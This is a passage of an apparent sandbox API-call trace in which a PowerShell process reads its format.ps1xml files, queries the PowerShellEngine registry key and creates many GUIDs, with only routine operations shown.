	[0481.834] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.834] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.835] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.835] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.835] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.836] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.836] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.837] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.837] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.838] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.838] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.838] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0xe67, lpOverlapped=0x0) returned 1
	[0481.838] ReadFile (in: hFile=0x330, lpBuffer=0x3051577, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051577*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0481.839] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0481.839] CloseHandle (hObject=0x330) returned 1
	[0481.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0481.839] SetErrorMode (uMode=0x1) returned 0x1
	[0481.839] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0481.839] SetErrorMode (uMode=0x1) returned 0x1
	[0481.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0481.840] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x330) returned 0x0
	[0481.840] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0481.840] CoTaskMemAlloc (cb=0x5a) returned 0x43be30
	[0481.840] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x43be30, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0481.840] CoTaskMemFree (pv=0x43be30) 
	[0481.840] RegCloseKey (hKey=0x330) returned 0x0
	[0481.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0481.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0482.652] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x8c3cac1d, Data2=0x2855, Data3=0x475d, Data4=([0]=0x80, [1]=0xc6, [2]=0x45, [3]=0xcf, [4]=0x1b, [5]=0x3d, [6]=0xf2, [7]=0x32))) returned 0x0
	[0482.652] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x881c09c2, Data2=0x5b3a, Data3=0x4366, Data4=([0]=0x92, [1]=0xc1, [2]=0x39, [3]=0x7d, [4]=0x76, [5]=0xbc, [6]=0x63, [7]=0x77))) returned 0x0
	[0482.652] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x6021f281, Data2=0xd432, Data3=0x47d1, Data4=([0]=0xb7, [1]=0xc8, [2]=0xe7, [3]=0x4a, [4]=0x8a, [5]=0x1c, [6]=0x16, [7]=0x9d))) returned 0x0
	[0482.652] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xea4a1b09, Data2=0xe03b, Data3=0x41ca, Data4=([0]=0x9c, [1]=0xaf, [2]=0x75, [3]=0x4a, [4]=0x8b, [5]=0x2c, [6]=0xe8, [7]=0xf6))) returned 0x0
	[0482.652] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3d37401d, Data2=0x2968, Data3=0x4079, Data4=([0]=0x86, [1]=0xe1, [2]=0x8a, [3]=0xf1, [4]=0x7e, [5]=0x40, [6]=0xea, [7]=0x9))) returned 0x0
	[0482.652] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xfe03078c, Data2=0x1d53, Data3=0x4bc4, Data4=([0]=0xa0, [1]=0xf8, [2]=0xb2, [3]=0x90, [4]=0xcb, [5]=0x66, [6]=0x8b, [7]=0x5d))) returned 0x0
	[0482.652] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x1e254c69, Data2=0x5a91, Data3=0x4686, Data4=([0]=0xbe, [1]=0x6f, [2]=0x38, [3]=0x13, [4]=0x3a, [5]=0x19, [6]=0x0, [7]=0x73))) returned 0x0
	[0482.653] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x45424c7e, Data2=0xf14e, Data3=0x4aa4, Data4=([0]=0x83, [1]=0xd7, [2]=0x66, [3]=0xfa, [4]=0x37, [5]=0x1c, [6]=0x69, [7]=0x70))) returned 0x0
	[0482.653] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xc6d37980, Data2=0x27ae, Data3=0x48c6, Data4=([0]=0xb0, [1]=0xa4, [2]=0xa3, [3]=0x3d, [4]=0xc1, [5]=0x33, [6]=0x5a, [7]=0xd3))) returned 0x0
	[0482.653] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x186dd08b, Data2=0x7ad6, Data3=0x426b, Data4=([0]=0x82, [1]=0x87, [2]=0x8c, [3]=0x3e, [4]=0xed, [5]=0x78, [6]=0xd7, [7]=0x97))) returned 0x0
	[0482.653] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x258e975d, Data2=0xf605, Data3=0x414d, Data4=([0]=0x85, [1]=0x3e, [2]=0x12, [3]=0xa8, [4]=0xd0, [5]=0xd9, [6]=0x23, [7]=0x9f))) returned 0x0
	[0482.653] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x281b9b36, Data2=0x3bd3, Data3=0x4f47, Data4=([0]=0xb3, [1]=0xe1, [2]=0xce, [3]=0xdd, [4]=0x49, [5]=0x13, [6]=0x87, [7]=0x37))) returned 0x0
	[0482.653] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xffa6d4d0, Data2=0x51c3, Data3=0x499b, Data4=([0]=0x85, [1]=0x9, [2]=0xb9, [3]=0x74, [4]=0x9c, [5]=0x12, [6]=0xbe, [7]=0x71))) returned 0x0
	[0482.654] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x7df45398, Data2=0xad0a, Data3=0x4c07, Data4=([0]=0xba, [1]=0x81, [2]=0x48, [3]=0x25, [4]=0x1f, [5]=0x31, [6]=0xa, [7]=0x2f))) returned 0x0
	[0482.654] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x791df1de, Data2=0x90b7, Data3=0x4392, Data4=([0]=0xb6, [1]=0x82, [2]=0x11, [3]=0xba, [4]=0x41, [5]=0x28, [6]=0xb7, [7]=0x52))) returned 0x0
	[0482.654] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x857259f3, Data2=0x7f0a, Data3=0x4b7c, Data4=([0]=0xbb, [1]=0x32, [2]=0x85, [3]=0xfa, [4]=0x68, [5]=0x28, [6]=0x1f, [7]=0xf5))) returned 0x0
	[0482.654] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x15b59f26, Data2=0xc85c, Data3=0x4c05, Data4=([0]=0x80, [1]=0xcd, [2]=0x21, [3]=0x8d, [4]=0x64, [5]=0x60, [6]=0x83, [7]=0x64))) returned 0x0
	[0482.654] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x57ad5c49, Data2=0x49dd, Data3=0x496d, Data4=([0]=0xbe, [1]=0x39, [2]=0x36, [3]=0x93, [4]=0x57, [5]=0x2e, [6]=0xb2, [7]=0x40))) returned 0x0
	[0482.654] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x9d4b0219, Data2=0x6582, Data3=0x4e20, Data4=([0]=0x89, [1]=0x66, [2]=0xab, [3]=0xab, [4]=0xfb, [5]=0x70, [6]=0xfc, [7]=0x9d))) returned 0x0
	[0482.655] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x8278c1db, Data2=0x9b9f, Data3=0x4a34, Data4=([0]=0x97, [1]=0xeb, [2]=0x97, [3]=0x58, [4]=0x54, [5]=0xa7, [6]=0xc8, [7]=0x5c))) returned 0x0
	[0482.655] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3438182c, Data2=0xae29, Data3=0x4fcd, Data4=([0]=0xba, [1]=0x0, [2]=0xf9, [3]=0x4f, [4]=0x25, [5]=0x23, [6]=0x50, [7]=0x45))) returned 0x0
	[0482.655] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xbf3f77a8, Data2=0x2802, Data3=0x4906, Data4=([0]=0x8a, [1]=0xfe, [2]=0x26, [3]=0x58, [4]=0x9d, [5]=0xd4, [6]=0x2a, [7]=0x94))) returned 0x0
	[0482.655] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3358082b, Data2=0xf5e4, Data3=0x41cb, Data4=([0]=0xb6, [1]=0xa6, [2]=0xbf, [3]=0xe4, [4]=0x35, [5]=0x81, [6]=0xfe, [7]=0xb1))) returned 0x0
	[0482.655] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x4057cfc, Data2=0x8c79, Data3=0x4168, Data4=([0]=0xb9, [1]=0xae, [2]=0x2d, [3]=0x96, [4]=0x38, [5]=0x48, [6]=0x92, [7]=0x21))) returned 0x0
	[0482.655] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x675a3937, Data2=0x259b, Data3=0x4b1b, Data4=([0]=0x84, [1]=0x21, [2]=0x7, [3]=0x91, [4]=0x72, [5]=0x3e, [6]=0xd8, [7]=0xf3))) returned 0x0
	[0482.655] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xf26a9efd, Data2=0x9a53, Data3=0x4f95, Data4=([0]=0x98, [1]=0x83, [2]=0xd3, [3]=0xee, [4]=0xaf, [5]=0xc2, [6]=0x95, [7]=0x6d))) returned 0x0
	[0482.656] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xef33b832, Data2=0xa4b9, Data3=0x447c, Data4=([0]=0x92, [1]=0xc0, [2]=0x36, [3]=0xbc, [4]=0x4d, [5]=0x62, [6]=0xfb, [7]=0xcd))) returned 0x0
	[0482.656] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xedb17300, Data2=0xcc8e, Data3=0x4603, Data4=([0]=0xb5, [1]=0x26, [2]=0xd1, [3]=0x5d, [4]=0xd5, [5]=0x7a, [6]=0xbe, [7]=0xa1))) returned 0x0
	[0482.656] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x87611bf8, Data2=0xedd, Data3=0x42bd, Data4=([0]=0xaa, [1]=0xcb, [2]=0x54, [3]=0x8d, [4]=0xcb, [5]=0x87, [6]=0x3f, [7]=0x7f))) returned 0x0
	[0482.656] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xc159311e, Data2=0x260, Data3=0x4871, Data4=([0]=0xac, [1]=0x55, [2]=0xff, [3]=0x23, [4]=0xdd, [5]=0xc2, [6]=0x7a, [7]=0x9d))) returned 0x0
	[0482.656] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x9e09d449, Data2=0xa86c, Data3=0x4da4, Data4=([0]=0xb0, [1]=0x2, [2]=0x32, [3]=0xe1, [4]=0xa0, [5]=0xe4, [6]=0x56, [7]=0x5a))) returned 0x0
	[0482.656] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xd7550f25, Data2=0x521f, Data3=0x4ec0, Data4=([0]=0x9a, [1]=0x6c, [2]=0x3c, [3]=0x77, [4]=0x39, [5]=0xbe, [6]=0x54, [7]=0xf7))) returned 0x0
	[0482.657] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x4e232a23, Data2=0xb618, Data3=0x45c6, Data4=([0]=0x8e, [1]=0x1c, [2]=0xb3, [3]=0xed, [4]=0x7c, [5]=0x9, [6]=0x40, [7]=0xdf))) returned 0x0
	[0482.658] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x84c896ad, Data2=0xd507, Data3=0x4c08, Data4=([0]=0xaa, [1]=0xa5, [2]=0x74, [3]=0x41, [4]=0x6f, [5]=0x3c, [6]=0x5a, [7]=0xbc))) returned 0x0
	[0482.658] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x758e42e8, Data2=0xf5e2, Data3=0x418a, Data4=([0]=0x99, [1]=0xcd, [2]=0x4d, [3]=0xc8, [4]=0x4b, [5]=0xe9, [6]=0x32, [7]=0xd3))) returned 0x0
	[0482.658] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3bbb0c77, Data2=0xf1a8, Data3=0x429e, Data4=([0]=0x90, [1]=0x87, [2]=0xf8, [3]=0x32, [4]=0xae, [5]=0xbb, [6]=0x8a, [7]=0xe5))) returned 0x0
	[0482.659] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x5ff3df11, Data2=0x38a, Data3=0x45ad, Data4=([0]=0x8e, [1]=0x51, [2]=0xc, [3]=0x2, [4]=0x87, [5]=0x4b, [6]=0xa4, [7]=0x4f))) returned 0x0
	[0482.659] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x2f0c3842, Data2=0x9310, Data3=0x48f1, Data4=([0]=0xb0, [1]=0x95, [2]=0x1a, [3]=0x7d, [4]=0xb4, [5]=0x67, [6]=0x9c, [7]=0x7a))) returned 0x0
	[0482.659] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x865248d2, Data2=0x4836, Data3=0x4f68, Data4=([0]=0xaf, [1]=0xc0, [2]=0xc9, [3]=0xd0, [4]=0x8b, [5]=0x0, [6]=0x11, [7]=0x79))) returned 0x0
	[0482.659] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xa8e8fb58, Data2=0x52b2, Data3=0x4791, Data4=([0]=0x91, [1]=0x8e, [2]=0x13, [3]=0xde, [4]=0xd5, [5]=0xfd, [6]=0x84, [7]=0xe9))) returned 0x0
	[0482.659] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xb3708caa, Data2=0x19ac, Data3=0x441e, Data4=([0]=0x96, [1]=0x66, [2]=0x9c, [3]=0xa8, [4]=0x68, [5]=0x75, [6]=0xf9, [7]=0xac))) returned 0x0
	[0482.659] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x43d5c87c, Data2=0x8815, Data3=0x484c, Data4=([0]=0x81, [1]=0x5a, [2]=0xc6, [3]=0x12, [4]=0xb0, [5]=0x16, [6]=0x43, [7]=0x40))) returned 0x0
	[0482.660] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x289d7947, Data2=0xbe6b, Data3=0x4efa, Data4=([0]=0xb6, [1]=0xe, [2]=0xfa, [3]=0xf, [4]=0xb7, [5]=0x12, [6]=0x81, [7]=0x58))) returned 0x0
	[0482.660] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xa6676457, Data2=0x47f7, Data3=0x4e57, Data4=([0]=0xa1, [1]=0x20, [2]=0x2e, [3]=0xcd, [4]=0x6f, [5]=0x77, [6]=0xea, [7]=0x6f))) returned 0x0
	[0482.660] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xbbfb7bcb, Data2=0x7afc, Data3=0x4455, Data4=([0]=0x85, [1]=0x35, [2]=0x9d, [3]=0xac, [4]=0x1, [5]=0xc6, [6]=0x6c, [7]=0x60))) returned 0x0
	[0482.660] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xc9d66b0a, Data2=0x9ff3, Data3=0x47b3, Data4=([0]=0xb1, [1]=0x47, [2]=0x14, [3]=0x5d, [4]=0x5f, [5]=0x98, [6]=0x6a, [7]=0x6f))) returned 0x0
	[0482.660] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x73ef3fa9, Data2=0xfb78, Data3=0x4ecb, Data4=([0]=0x93, [1]=0xf9, [2]=0xe0, [3]=0xde, [4]=0x50, [5]=0xb0, [6]=0x23, [7]=0x94))) returned 0x0
	[0482.660] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x792e12a9, Data2=0x8965, Data3=0x4555, Data4=([0]=0xa3, [1]=0xe6, [2]=0xbd, [3]=0xa3, [4]=0x5, [5]=0xbc, [6]=0xee, [7]=0x4c))) returned 0x0
	[0482.661] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0482.661] GetFileType (hFile=0x330) returned 0x1
	[0482.661] SetErrorMode (uMode=0x1) returned 0x1
	[0482.661] GetFileType (hFile=0x330) returned 0x1
	[0482.661] ReadFile (in: hFile=0x330, lpBuffer=0x31aff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31aff40*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0482.662] ReadFile (in: hFile=0x330, lpBuffer=0x31aff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31aff40*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0482.662] ReadFile (in: hFile=0x330, lpBuffer=0x31aff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31aff40*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0482.663] ReadFile (in: hFile=0x330, lpBuffer=0x31aff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31aff40*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0482.663] ReadFile (in: hFile=0x330, lpBuffer=0x31aff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31aff40*, lpNumberOfBytesRead=0x22d4b8*=0x8b4, lpOverlapped=0x0) returned 1
	[0482.663] ReadFile (in: hFile=0x330, lpBuffer=0x31af35c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31af35c*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0482.663] ReadFile (in: hFile=0x330, lpBuffer=0x31aff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31aff40*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0482.663] CloseHandle (hObject=0x330) returned 1
	[0482.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0482.663] SetErrorMode (uMode=0x1) returned 0x1
	[0482.664] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0482.664] SetErrorMode (uMode=0x1) returned 0x1
	[0482.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0482.664] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x330) returned 0x0
	[0482.664] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0482.664] CoTaskMemAlloc (cb=0x5a) returned 0x43be30
	[0482.664] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x43be30, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0482.664] CoTaskMemFree (pv=0x43be30) 
	[0482.665] RegCloseKey (hKey=0x330) returned 0x0
	[0482.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0482.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0482.665] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x80175ee1, Data2=0xbf41, Data3=0x4fa5, Data4=([0]=0xb7, [1]=0xdd, [2]=0xdd, [3]=0xe2, [4]=0x36, [5]=0x44, [6]=0xfc, [7]=0x7b))) returned 0x0
	[0482.665] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xeb377811, Data2=0xdc11, Data3=0x4c94, Data4=([0]=0xb4, [1]=0x7a, [2]=0xe0, [3]=0xbc, [4]=0x52, [5]=0xe6, [6]=0xc4, [7]=0x9b))) returned 0x0
	[0482.666] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0482.666] GetFileType (hFile=0x330) returned 0x1
	[0482.666] SetErrorMode (uMode=0x1) returned 0x1
	[0482.666] GetFileType (hFile=0x330) returned 0x1
